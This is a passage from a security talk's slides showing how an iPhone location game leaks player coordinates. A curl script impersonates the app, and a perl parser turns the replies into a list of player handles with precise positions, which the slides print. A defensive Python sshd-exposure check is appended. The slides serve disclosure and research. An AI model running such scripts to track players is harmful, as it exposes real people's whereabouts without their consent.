  • 75. Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy
  • 76. Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy • Location matters, move product from point A to point B
  • 77. Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy • Location matters, move product from point A to point B • Phone sends high resolution coordinates to game server
  • 81. Paros • Client side proxy • Configure iPhone to use machine running Paros’s IP address as proxy • Watch what your apps send and receive
  • 84. Used to monitor players
  • 90. Let’s pick a non-intel agency player chezk
  • 96. Ok neat, what else?
  • 97. Near real-time geolocation tracking of players
  • 98. cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots
  • 99. curl script
        #!/bin/sh
        #
        # First login...
        #
        curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" \
            -d @/home/trevor/iphone/login.xml \
            --dump-header /home/trevor/iphone/headers.txt \
            http://game.dl.a-steroids.com/TrafficServer/
        #
        # Then update location
        curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" \
            -b /home/trevor/iphone/headers.txt \
            -d @/home/trevor/iphone/update_loc.xml \
            http://game.dl.a-steroids.com/TrafficServer/
        #
        # Get GMap objects
        curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" \
            -b /home/trevor/iphone/headers.txt \
            -d @/home/trevor/iphone/gmap_update.xml \
            http://game.dl.a-steroids.com/TrafficServer/
  • 100. perl script
        #! /usr/bin/perl
        use strict;
        use warnings;

        # make single or multiline input into one scalar
        my $glob = join('',(<>));

        # extract name-to-flag records
        my @records = $glob =~ /(<name>.*?<\/lon>)/ig;

        for (@records) {
            # capture the player name and the latitude/longitude of each record
            my ($name,$lat,$lon) = $_ =~ qr|<name>(.*?)</name>.*?<lat>([-\d.]*)</lat><lon>([-\d.]*)</lon>|i;
            print "$lat,$lon,$name\n";
        }
  • 101. perl script output
        39.93220206723633,-77.47186584472656,poppyseed
        38.13753356933594,-77.06847380591797,Gadsden
        39.98429718017578,-78.30014190673828,Ziggety
        39.23520812988281,-77.40483581542969,Lexi
        39.855418395996094,-77.2717056274414,Tatu
        39.55705801582031,-77.4004086303711,Bigfoot
        36.67790985107422,-77.5902328491211,Jeneko
        38.297552490234375,-77.65829467773438,Stilbored
        39.891050720214844,-77.55879211025781,Timoteo
        39.66313247680664,-78.04374694824219,Gamber
        36.295310314697266,-78.14061126700984,UnderWear
  • 110. Comments/Feedback: trevor.hawthorn@stratumsecurity.com www.stratumsecurity.com Twitter: @packetwerks @stratumsecurity Special Thanks: Tiago Stock
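
Slide 71 asks that sshd not be bound to the pdp interfaces. The check below is an added example, not code from the talk: it takes captured `ifconfig` output and `sshd_config` text and reports which cellular addresses sshd would listen on over IPv4. The sample input is trimmed from slide 25; the function names and the `pdp_ip` prefix parameter are assumptions of this example.

```python
import ipaddress
import re

# Constructed sample, trimmed from the ifconfig output shown on slide 25.
IFCONFIG_SAMPLE = """\
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
\tinet 127.0.0.1 netmask 0xff000000
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
\tinet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
\tinet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
"""


def parse_ifconfig(text):
    """Map each interface name to its IPv4 addresses (BSD-style ifconfig)."""
    addrs, current = {}, None
    for line in text.splitlines():
        header = re.match(r"([A-Za-z0-9_]+):\s+flags=", line)
        if header:
            current = header.group(1)
            addrs[current] = []
            continue
        inet = re.match(r"\s+inet\s+(\d+\.\d+\.\d+\.\d+)", line)
        if inet and current is not None:
            addrs[current].append(inet.group(1))
    return addrs


def listen_addresses(sshd_config):
    """IPv4 addresses sshd is told to bind; 0.0.0.0 means every address."""
    found, directive_seen = [], False
    for raw in sshd_config.splitlines():
        parts = re.split(r"[\s=]+", raw.split("#", 1)[0].strip(), maxsplit=1)
        if parts[0].lower() != "listenaddress" or len(parts) < 2 or not parts[1]:
            continue
        directive_seen = True
        value = parts[1].split()[0]
        if value.startswith("["):            # [addr]:port
            host = value[1:].split("]", 1)[0]
        elif value.count(":") == 1:          # addr:port
            host = value.split(":", 1)[0]
        else:                                # bare IPv4, IPv6 or hostname
            host = value
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            found.append("0.0.0.0")          # unresolved hostname: assume the worst
            continue
        if ip.version == 4:                  # IPv6 listeners are out of scope here
            found.append(str(ip))
    # With no ListenAddress line at all, sshd listens on all local addresses.
    return found if directive_seen else ["0.0.0.0"]


def exposed_cellular(ifconfig_text, sshd_config, prefix="pdp_ip"):
    """Return sorted (interface, address) pairs on cellular interfaces that sshd binds."""
    listeners = listen_addresses(sshd_config)
    wildcard = "0.0.0.0" in listeners
    hits = []
    for iface, addrs in parse_ifconfig(ifconfig_text).items():
        if iface.startswith(prefix):
            hits += [(iface, a) for a in addrs if wildcard or a in listeners]
    return sorted(hits)


if __name__ == "__main__":
    # Default config (no ListenAddress) versus one pinned to the en1 address.
    print(exposed_cellular(IFCONFIG_SAMPLE, ""))
    print(exposed_cellular(IFCONFIG_SAMPLE, "ListenAddress 192.168.20.1\n"))
```

An empty result for a device's real `ifconfig` and `sshd_config` text means no IPv4 sshd listener covers a cellular interface address.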